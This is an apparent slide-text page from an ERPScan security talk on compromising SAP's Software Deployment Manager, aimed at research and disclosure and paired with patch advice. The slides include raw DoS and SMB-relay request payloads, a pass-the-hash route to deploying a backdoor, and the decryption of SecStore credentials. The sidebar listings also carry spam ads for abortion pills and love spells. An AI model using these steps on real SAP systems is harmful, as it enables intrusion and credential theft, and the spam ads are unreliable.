EAS-SEC: Framework for securing business applications
EAS-SEC: Framework for securing business applicationsEAS-SEC: Framework for securing business applications
EAS-SEC: Framework for securing business applications
 
Architecture vulnerabilities in SAP platforms
Architecture vulnerabilities in SAP platformsArchitecture vulnerabilities in SAP platforms
Architecture vulnerabilities in SAP platforms
 
Experiences of SOACS
Experiences of SOACSExperiences of SOACS
Experiences of SOACS
 
Sap basis-transaction-codes
Sap basis-transaction-codesSap basis-transaction-codes
Sap basis-transaction-codes
 
SAP (In)Security: New and Best
SAP (In)Security: New and BestSAP (In)Security: New and Best
SAP (In)Security: New and Best
 
SAP (in)security: New and best
SAP (in)security: New and bestSAP (in)security: New and best
SAP (in)security: New and best
 
AMIS Oracle OpenWorld 2015 Review – part 3- PaaS Database, Integration, Ident...
AMIS Oracle OpenWorld 2015 Review – part 3- PaaS Database, Integration, Ident...AMIS Oracle OpenWorld 2015 Review – part 3- PaaS Database, Integration, Ident...
AMIS Oracle OpenWorld 2015 Review – part 3- PaaS Database, Integration, Ident...
 
An easy way into your sap systems v3.0
An easy way into your sap systems v3.0An easy way into your sap systems v3.0
An easy way into your sap systems v3.0
 
Crea la tua prima serverless ledger-based app con QLDB e NodeJS
Crea la tua prima serverless ledger-based app con QLDB e NodeJSCrea la tua prima serverless ledger-based app con QLDB e NodeJS
Crea la tua prima serverless ledger-based app con QLDB e NodeJS
 
Plam16 jan
Plam16 janPlam16 jan
Plam16 jan
 
Indice
IndiceIndice
Indice
 
Device Independent API design
Device Independent API designDevice Independent API design
Device Independent API design
 
A Big Data Lake Based on Spark for BBVA Bank-(Oscar Mendez, STRATIO)
A Big Data Lake Based on Spark for BBVA Bank-(Oscar Mendez, STRATIO)A Big Data Lake Based on Spark for BBVA Bank-(Oscar Mendez, STRATIO)
A Big Data Lake Based on Spark for BBVA Bank-(Oscar Mendez, STRATIO)
 
Putting Private Clouds to Work with PaaS Interop 2013 Vegas Diane Mueller
Putting Private Clouds to Work with PaaS Interop 2013 Vegas Diane MuellerPutting Private Clouds to Work with PaaS Interop 2013 Vegas Diane Mueller
Putting Private Clouds to Work with PaaS Interop 2013 Vegas Diane Mueller
 
Putting Private Clouds to Work with PaaS Interop Vegas 2013 presentation by D...
Putting Private Clouds to Work with PaaS Interop Vegas 2013 presentation by D...Putting Private Clouds to Work with PaaS Interop Vegas 2013 presentation by D...
Putting Private Clouds to Work with PaaS Interop Vegas 2013 presentation by D...
 
SAP Solution Manager - Netweaver on HANA Monitoring Setup Part 1 of 3 (Prepar...
SAP Solution Manager - Netweaver on HANA Monitoring Setup Part 1 of 3 (Prepar...SAP Solution Manager - Netweaver on HANA Monitoring Setup Part 1 of 3 (Prepar...
SAP Solution Manager - Netweaver on HANA Monitoring Setup Part 1 of 3 (Prepar...
 
Marriage of ESX and OpenStack - PayPal - VMWorld US 2013
Marriage of ESX and OpenStack - PayPal - VMWorld US 2013Marriage of ESX and OpenStack - PayPal - VMWorld US 2013
Marriage of ESX and OpenStack - PayPal - VMWorld US 2013
 

Plus de ERPScan

Chinese attack on USIS exploiting SAP vulnerability. Detailed review and comm...
Chinese attack on USIS exploiting SAP vulnerability. Detailed review and comm...Chinese attack on USIS exploiting SAP vulnerability. Detailed review and comm...
Chinese attack on USIS exploiting SAP vulnerability. Detailed review and comm...ERPScan
 
The latest changes to SAP cybersecurity landscape
The latest changes to SAP cybersecurity landscapeThe latest changes to SAP cybersecurity landscape
The latest changes to SAP cybersecurity landscapeERPScan
 
Oracle PeopleSoft applications are under attacks (Hack in Paris)
Oracle PeopleSoft applications are under attacks (Hack in Paris)Oracle PeopleSoft applications are under attacks (Hack in Paris)
Oracle PeopleSoft applications are under attacks (Hack in Paris)ERPScan
 
5 real ways to destroy business by breaking SAP applications
5 real ways to destroy business by breaking SAP applications5 real ways to destroy business by breaking SAP applications
5 real ways to destroy business by breaking SAP applicationsERPScan
 
13 real ways to destroy business by breaking company’s SAP applications
13 real ways to destroy business by breaking company’s SAP applications13 real ways to destroy business by breaking company’s SAP applications
13 real ways to destroy business by breaking company’s SAP applicationsERPScan
 
EAS-SEC Project
EAS-SEC ProjectEAS-SEC Project
EAS-SEC ProjectERPScan
 
If I want a perfect cyberweapon, I'll target ERP
If I want a perfect cyberweapon, I'll target ERPIf I want a perfect cyberweapon, I'll target ERP
If I want a perfect cyberweapon, I'll target ERPERPScan
 
What CISOs should know about SAP security
What CISOs should know about SAP securityWhat CISOs should know about SAP security
What CISOs should know about SAP securityERPScan
 
With big data comes big responsibility
With big data comes big responsibilityWith big data comes big responsibility
With big data comes big responsibilityERPScan
 
Practical pentesting of ERPs and business applications
Practical pentesting of ERPs and business applicationsPractical pentesting of ERPs and business applications
Practical pentesting of ERPs and business applicationsERPScan
 
Breaking SAP portal (HashDays)
Breaking SAP portal (HashDays)Breaking SAP portal (HashDays)
Breaking SAP portal (HashDays)ERPScan
 
SSRF vs. Business-critical applications. Part 2. New vectors and connect-back...
SSRF vs. Business-critical applications. Part 2. New vectors and connect-back...SSRF vs. Business-critical applications. Part 2. New vectors and connect-back...
SSRF vs. Business-critical applications. Part 2. New vectors and connect-back...ERPScan
 

Plus de ERPScan (12)

Chinese attack on USIS exploiting SAP vulnerability. Detailed review and comm...
Chinese attack on USIS exploiting SAP vulnerability. Detailed review and comm...Chinese attack on USIS exploiting SAP vulnerability. Detailed review and comm...
Chinese attack on USIS exploiting SAP vulnerability. Detailed review and comm...
 
The latest changes to SAP cybersecurity landscape
The latest changes to SAP cybersecurity landscapeThe latest changes to SAP cybersecurity landscape
The latest changes to SAP cybersecurity landscape
 
Oracle PeopleSoft applications are under attacks (Hack in Paris)
Oracle PeopleSoft applications are under attacks (Hack in Paris)Oracle PeopleSoft applications are under attacks (Hack in Paris)
Oracle PeopleSoft applications are under attacks (Hack in Paris)
 
5 real ways to destroy business by breaking SAP applications
5 real ways to destroy business by breaking SAP applications5 real ways to destroy business by breaking SAP applications
5 real ways to destroy business by breaking SAP applications
 
13 real ways to destroy business by breaking company’s SAP applications
13 real ways to destroy business by breaking company’s SAP applications13 real ways to destroy business by breaking company’s SAP applications
13 real ways to destroy business by breaking company’s SAP applications
 
EAS-SEC Project
EAS-SEC ProjectEAS-SEC Project
EAS-SEC Project
 
If I want a perfect cyberweapon, I'll target ERP
If I want a perfect cyberweapon, I'll target ERPIf I want a perfect cyberweapon, I'll target ERP
If I want a perfect cyberweapon, I'll target ERP
 
What CISOs should know about SAP security
What CISOs should know about SAP securityWhat CISOs should know about SAP security
What CISOs should know about SAP security
 
With big data comes big responsibility
With big data comes big responsibilityWith big data comes big responsibility
With big data comes big responsibility
 
Practical pentesting of ERPs and business applications
Practical pentesting of ERPs and business applicationsPractical pentesting of ERPs and business applications
Practical pentesting of ERPs and business applications
 
Breaking SAP portal (HashDays)
Breaking SAP portal (HashDays)Breaking SAP portal (HashDays)
Breaking SAP portal (HashDays)
 
SSRF vs. Business-critical applications. Part 2. New vectors and connect-back...
SSRF vs. Business-critical applications. Part 2. New vectors and connect-back...SSRF vs. Business-critical applications. Part 2. New vectors and connect-back...
SSRF vs. Business-critical applications. Part 2. New vectors and connect-back...
 

Dernier

Direct Style Effect Systems - The Print[A] Example - A Comprehension Aid
Direct Style Effect Systems - The Print[A] Example - A Comprehension AidDirect Style Effect Systems - The Print[A] Example - A Comprehension Aid
Direct Style Effect Systems - The Print[A] Example - A Comprehension AidPhilip Schwarz
 
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...panagenda
 
%+27788225528 love spells in Toronto Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Toronto Psychic Readings, Attraction spells,Brin...%+27788225528 love spells in Toronto Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Toronto Psychic Readings, Attraction spells,Brin...masabamasaba
 
Artyushina_Guest lecture_YorkU CS May 2024.pptx
Artyushina_Guest lecture_YorkU CS May 2024.pptxArtyushina_Guest lecture_YorkU CS May 2024.pptx
Artyushina_Guest lecture_YorkU CS May 2024.pptxAnnaArtyushina1
 
What Goes Wrong with Language Definitions and How to Improve the Situation
What Goes Wrong with Language Definitions and How to Improve the SituationWhat Goes Wrong with Language Definitions and How to Improve the Situation
What Goes Wrong with Language Definitions and How to Improve the SituationJuha-Pekka Tolvanen
 
WSO2CON 2024 - Does Open Source Still Matter?
WSO2CON 2024 - Does Open Source Still Matter?WSO2CON 2024 - Does Open Source Still Matter?
WSO2CON 2024 - Does Open Source Still Matter?WSO2
 
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfonteinmasabamasaba
 
%in Benoni+277-882-255-28 abortion pills for sale in Benoni
%in Benoni+277-882-255-28 abortion pills for sale in Benoni%in Benoni+277-882-255-28 abortion pills for sale in Benoni
%in Benoni+277-882-255-28 abortion pills for sale in Benonimasabamasaba
 
WSO2CON 2024 - WSO2's Digital Transformation Journey with Choreo: A Platforml...
WSO2CON 2024 - WSO2's Digital Transformation Journey with Choreo: A Platforml...WSO2CON 2024 - WSO2's Digital Transformation Journey with Choreo: A Platforml...
WSO2CON 2024 - WSO2's Digital Transformation Journey with Choreo: A Platforml...WSO2
 
Devoxx UK 2024 - Going serverless with Quarkus, GraalVM native images and AWS...
Devoxx UK 2024 - Going serverless with Quarkus, GraalVM native images and AWS...Devoxx UK 2024 - Going serverless with Quarkus, GraalVM native images and AWS...
Devoxx UK 2024 - Going serverless with Quarkus, GraalVM native images and AWS...Bert Jan Schrijver
 
tonesoftg
tonesoftgtonesoftg
tonesoftglanshi9
 
%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...
%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...
%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...masabamasaba
 
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...Shane Coughlan
 
%in kempton park+277-882-255-28 abortion pills for sale in kempton park
%in kempton park+277-882-255-28 abortion pills for sale in kempton park %in kempton park+277-882-255-28 abortion pills for sale in kempton park
%in kempton park+277-882-255-28 abortion pills for sale in kempton park masabamasaba
 
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...masabamasaba
 
8257 interfacing 2 in microprocessor for btech students
8257 interfacing 2 in microprocessor for btech students8257 interfacing 2 in microprocessor for btech students
8257 interfacing 2 in microprocessor for btech studentsHimanshiGarg82
 
%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisa%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisamasabamasaba
 
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyviewmasabamasaba
 
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdf
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdfPayment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdf
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdfkalichargn70th171
 

Dernier (20)

Direct Style Effect Systems - The Print[A] Example - A Comprehension Aid
Direct Style Effect Systems - The Print[A] Example - A Comprehension AidDirect Style Effect Systems - The Print[A] Example - A Comprehension Aid
Direct Style Effect Systems - The Print[A] Example - A Comprehension Aid
 
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
 
%+27788225528 love spells in Toronto Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Toronto Psychic Readings, Attraction spells,Brin...%+27788225528 love spells in Toronto Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Toronto Psychic Readings, Attraction spells,Brin...
 
Artyushina_Guest lecture_YorkU CS May 2024.pptx
Artyushina_Guest lecture_YorkU CS May 2024.pptxArtyushina_Guest lecture_YorkU CS May 2024.pptx
Artyushina_Guest lecture_YorkU CS May 2024.pptx
 
Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...
Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...
Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...
 
What Goes Wrong with Language Definitions and How to Improve the Situation
What Goes Wrong with Language Definitions and How to Improve the SituationWhat Goes Wrong with Language Definitions and How to Improve the Situation
What Goes Wrong with Language Definitions and How to Improve the Situation
 
WSO2CON 2024 - Does Open Source Still Matter?
WSO2CON 2024 - Does Open Source Still Matter?WSO2CON 2024 - Does Open Source Still Matter?
WSO2CON 2024 - Does Open Source Still Matter?
 
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein
%in kaalfontein+277-882-255-28 abortion pills for sale in kaalfontein
 
%in Benoni+277-882-255-28 abortion pills for sale in Benoni
%in Benoni+277-882-255-28 abortion pills for sale in Benoni%in Benoni+277-882-255-28 abortion pills for sale in Benoni
%in Benoni+277-882-255-28 abortion pills for sale in Benoni
 
WSO2CON 2024 - WSO2's Digital Transformation Journey with Choreo: A Platforml...
WSO2CON 2024 - WSO2's Digital Transformation Journey with Choreo: A Platforml...WSO2CON 2024 - WSO2's Digital Transformation Journey with Choreo: A Platforml...
WSO2CON 2024 - WSO2's Digital Transformation Journey with Choreo: A Platforml...
 
Devoxx UK 2024 - Going serverless with Quarkus, GraalVM native images and AWS...
Devoxx UK 2024 - Going serverless with Quarkus, GraalVM native images and AWS...Devoxx UK 2024 - Going serverless with Quarkus, GraalVM native images and AWS...
Devoxx UK 2024 - Going serverless with Quarkus, GraalVM native images and AWS...
 
tonesoftg
tonesoftgtonesoftg
tonesoftg
 
%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...
%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...
%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...
 
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...
 
%in kempton park+277-882-255-28 abortion pills for sale in kempton park
%in kempton park+277-882-255-28 abortion pills for sale in kempton park %in kempton park+277-882-255-28 abortion pills for sale in kempton park
%in kempton park+277-882-255-28 abortion pills for sale in kempton park
 
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
 
8257 interfacing 2 in microprocessor for btech students
8257 interfacing 2 in microprocessor for btech students8257 interfacing 2 in microprocessor for btech students
8257 interfacing 2 in microprocessor for btech students
 
%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisa%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisa
 
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview
 
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdf
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdfPayment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdf
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdf
 

Injecting evil code in your SAP J2EE systems. Security of SAP Software Deployment Server

  • 1. Invest  in  security   to  secure  investments   Injec&ng  evil  code  in  your  SAP  J2EE   systems:  Security  of  SAP  So<ware   Deployment  Server   Dmitry  Chastukhin.  Director  of  SAP  pentest/ research  team  ERPScan  
  • 2. About  ERPScan   •  The   only   360-­‐degree   SAP   Security   solu&on   -­‐   ERPScan   Security   Monitoring  Suite  for  SAP   •  Leader  by  the  number  of  acknowledgements  from  SAP  (  150+  )   •  60+  presentaDons  key  security  conferences  worldwide   •  25  Awards  and  nominaDons   •  Research  team  -­‐  20  experts  with  experience  in    different  areas   of  security   •  Headquarters  in  Palo  Alto  (US)  and  Amsterdam  (EU)       2  
  • 3. SAP                         Вставьте  рисунок  на  слайд,  скруглите  верхний  левый  и  нижний  правый  угол   (Формат  –  Формат  рисунка),  добавьте  контур  (оранжевый,  толщина  –  3)   3   •  The  most  popular  business  applica&on   •  More  than  250000  customers  worldwide     •  83%  Forbes  500  companies  run  SAP   •  Main  system  –  ERP   •  3  Plaporms   -  NetWeaver  ABAP   -  NetWeaver  J2EE   -  BusinessObjects  
  • 4. SAP  insecurity   Espionage   •  Stealing  financial  informa&on   •  Stealing  corporate  secrets   •  Stealing  supplier  and  customer  lists   •  Stealing  HR  data   Fraud   •  False  transac&ons   •  Modifica&on  of  master  data   Sabotage   •  Denial  of  service   •  Modifica&on  of  financial  reports   •  Access  to  technology  network  (SCADA)  by  trust  rela&ons   4  
  • 5. 5   More  than  2800  in  total   Source:  SAP  Security  in  Figures   0   100   200   300   400   500   600   700   800   900   2001   2002   2003   2004   2005   2006   2007   2008   2009   2010   2011   2012   2013   2014   SAP  vulnerabiliDes  
  • 6. Is  it  remotely  exploitable?       6   >  5000    non-­‐web  SAP  services  exposed  in  the  world    including  Dispatcher,  Message  Server,  Sap  Host  Control,  etc.     sapscan.com  
  • 7. What  about  other  services?   0 1 2 3 4 5 6 7 8 9 SAP Dispatcher SAP MMC SAP Message Server SAP HostControl SAP ITS Agate SAP Message Server httpd 7   Source:  SAP  Security  in  Figures  
  • 8. •  SAP  NetWeaver  ABAP   •  SAP  NetWeaver  J2EE   –  SAP  Portal   –  SAP  Solu&on  Manager     –  SAP  NetWeaver  Development  Infrastracture  (NWDI)   •  SAP  BusinessObjects   •  SAP  HANA  Extended  Applica&on  Services     •  SAP  SUP   •  SAP  Fiori   8   SAP  ApplicaDon  server’s  
  • 9. •  Design  Time  Repository  (DTR)   •  Component  Build  Service  (CBS)   •  Change  Management  Service  (CMS)   •  So<ware  Landscape  Directory  (SLD)  /  NS   •  So<ware  Deployment  Manager  (SDM)   9   SAP  NetWeaver  development  infrastructure  
  • 10.           10   SAP  NetWeaver  development  infrastructure  
  • 11.             11   SAP  NetWeaver  development  infrastructure  
  • 12.       12   SAP  NetWeaver  development  infrastructure  
  • 13.     13   SAP  NetWeaver  development  infrastructure  
  • 14.     14   SAP  NetWeaver  development  infrastructure  
  • 15.     15   SAP  NetWeaver  development  infrastructure  
  • 16. So^ware  Deployment  Manager   •  Single  interface  for  the  deployment   •  Deploy  apps  (*.ear,  *.war,  *.sda)   •  Implement  custom  patches   16  
  • 17. SDM  server   •  Different  server  modes   –  standalone   –  integrated   •  Only  one  user  at  &me   •  Only  hardcoded  admin  user   •  Three  ports:   –  50017  –  Admin  Port   –  50018  –  GUI  Port   –  50019  –  H‚p  Port     17  
  • 18. SDM  client   •  Browsing  the  distribu&on  of  deployed  components   •  Deploying  and  undeploying   •  Log  viewing   18  
  • 19. SDM  a_ack  intro   •  SAP  infrastructure  includes  many  Java  services   •  Almost  all  Java  stuff  uses  UME   •  Universal  user  with  a  password   •  Only  one  user  at  a  &me   •  Ability  to  deploy  evil  code  =>  plus,  see  1st  item   19  
  • 20. SDM  a_ack  intro   •  Thick  client  Java  applica&on  (sad  story)   •  Scarce  communica&ons  se…ngs   •  Difficult  to  intercept   •  Custom  protocols   20  
  • 21. SDM  a_ack  intro   •  SAP  has  its  own  SAP  Java  Virtual  Machine  (JVM)   •  Java  6  has  A‚ach  API   •  A‚ach  to  another  running  JVM   •  Intercept  and  modify  calls   21  
  • 22. A_ack  SAP  SDM.  DoS     •  If  a‚acker  uses  an  incorrect  password  3  &mes,  the  server  will   shutdown  automa&cally   •  Also,  if  you  send  this  request,  you  can  shutdown  the  SDM  server   manually:   [10 spaces]56<?xml version="1.0"?> <ShutDownRequest></ShutDownRequest> 22  
  • 23. A_acking  SAP  SDM.  SMB  relay   Packed:     [10 Spaces]<?xml version="1.0"?> <FileAccessRequest f="ip_addrblabla"> </ FileAccessRequest>               An  old  trick,  but  some&mes  it’s  very  useful             23  
  • 24. PrevenDon   24         •   Install  note  1724516   •   Enable  the  security  features  of  SDM   •   SDM  server  and  SDM  client  need  to  be  updated   h‚ps://websmp205.sap-­‐ag.de/~sapidb/012006153200000493902012E/ SDM_EnablingSecurity.pdf    
  • 25. From  Nobody  to  Administrator   Now,  I  will  show  an  interes0ng  a2ack   Compromise  Some  SAP  Services     Compromise  SAP  SDM     Compromise  SAP  Server  OS       Compromise  SAP   25  
  • 26. SDM  authenDcaDon  abuse   •  OK.  Let’s  see  how  authen&ca&on  in  SDM  works:   –  user  enters  password   –  hash  is  calculated  locally  on  client   –  password  hash  is  sent  to  server   –  hash  is  compared  to  hash  from  configura&on  file       Pass  the  hash  a_ack  here!   26  
  • 27. SDM  authenDcaDon  abuse   RootFrame.class   27  
  • 28. SDM  authenDcaDon  abuse   …SDMprogramconfigsdmrepository.sdc   28  
  • 29. SDM  authenDcaDon  abuse   SMDAuthen&catorImpl.class   29  
  • 30. A_ack  on  SAP  SDM   Read  sdmrepository.sdc       Get  password  hash       Use  hash  as  password  to  authen&cate  on  SDM  server       Deploy  backdoor  on  SAP  Server       PROFIT!       30  
  • 31. File  read   •   OS  command  execu&on  through  CTC  (Notes  1467771,  1445998  )   •   XML  External  En&&es  (Note  1619539)   •   Directory  Traversal  (Note  1630293  )   •   Through  MMC  file  read  func&on  (Notes    927637  and  1439348)                                                                                                                        We  have  something  new  for  u  J   31  
  • 32. SAP  Log  Viewer  standalone   •  Open  ports:  26000  (NI),  1099  (RMI),  5465  (Socket)   •  You  can:   –  View  log  on  local  server   –  View  log  on  remote  server   –  Register  file  as  log  file   Read  log  file  without  authenDcaDon!   32  
  • 33. SAP  Log  Viewer  standalone   A_ack  is  pre_y  easy     Connect  to  LogViewer  standalone  Server       Register  sdmrepository.sdc  file  as  log  file       Read  it       33  
  • 34. SAP  Log  Viewer  standalone         34  
  • 35. SAP  Log  Viewer  standalone   When  we  have  a  password  hash,  we  can  use  it  as  password  to   authen&cate  on  SDM  server   35  
  • 36. SDM  intrusion   Full  info  about  the  SDM  repository   36  
  • 37. Bypassing  SDM  restricDons   •  Observe  all  server  directories   •  Read  arbitrary  files  via  Log  Viewer   37  
  • 38. SDM  undeploying   Undeploy  any  applica&on     38  
  • 39. SDM  backdooring   Deploy  any  applica&on       39  
  • 40. SDM  backdooring   •  before   •  a<er   40  
  • 42. PrevenDon   42         •   Install  Note  1724516,  1685106     •   Enable  the  security  features  of  SDM   •   SDM  server  and  SDM  client  need  to  be  updated   h‚ps://websmp205.sap-­‐ag.de/~sapidb/012006153200000493902012E/ SDM_EnablingSecurity.pdf    
  • 43.    “The  So=ware  Deployment  Manager  (SDM)  uses  the  database   connec0on  informa0on,  the  J2EE  Engine  administrator  user  and   password  from  the  secure  storage  in  the  file  system,  to  connect   to  the  J2EE  Engine  and  perform  tasks  such  as  so=ware   deployment  and  undeployment”.      h‚p://help.sap.com/saphelp_nw70ehp1/helpdata/en/3d/ 2e104202795e33e10000000a155106/content.htm   Wow!  J2EE  Engine  administrator  user  and  password   Where  is  all  this  stuff  located?   SAP  SecStore   43  
  • 44. SAP  SecStore    “By  default,  the  J2EE  Engine  stores  secure  data  in  the  file  usr sap<SID>SYSglobalsecuritydataSecStore.proper0es  in  the   file  system”.      “The  J2EE  Engine  uses  the  SAP  Java  Cryptography  Toolkit  to   encrypt  the  contents  of  the  secure  store  with  the   tripleDES  algorithm”.    h‚p://help.sap.com/saphelp_nw70ehp1/helpdata/en/3d/ 2e104202795e33e10000000a155106/content.htm     OK.  Let’s  try  to  read  SecStore.proper0es   44  
  • 45. SAP  SecStore   •  We  can  execute  any  OS  command  (we  have  our  backdoor)   •  We  know  the  SAP  J2EE  Engine  stores  the  database   user  SAP<SID>DB;  its  password  is  here:   usrsap<SID>SYSglobalsecuritydataSecStore.properties •  It’s  all  that  we  need   45  
  • 47. Get  the  password   •  We  have  an  encrypted  password   •  We  have  a  key  to  decrypt  it   47   We  got  the  J2EE  admin  and  JDBC   login:password!  
  • 48. PrevenDon   48       Restrict  read  access  to  files  SecStore.proper0es  and   SecStore.key     h‚p://help.sap.com/saphelp_nw73ehp1/helpdata/en/cd/ 14c93ec2f7df6ae10000000a114084/content.htm      
  • 51. SAP  Guides   It’s  all  in  your  hands   Regular  security  assessments   ABAP  code  review   Monitoring  technical  security   SegregaDon  of  DuDes   Security  events  monitoring   Conclusion   It  is  possible  to  protect  yourself  from  these  kinds  of  issues,     and  we  are  working  close  with  SAP  to  keep  customers  secure  
  • 52. Future  work   I'd  like  to  thank  SAP's  Product  Security  Response  Team  for  the  great   coopera0on  to  make  SAP  systems  more  secure.  Research  is  always   ongoing,  and  we  can't  share  all  of  it  today.  If  you  want  to  be  the   first   to   see   new   a2acks   and   demos,   follow   us   at   @erpscan   and   a2end  future  presenta0ons:     52   web:  www.erpscan.com         e-­‐mail:  info@erpscan.com,  sales@erpscan.com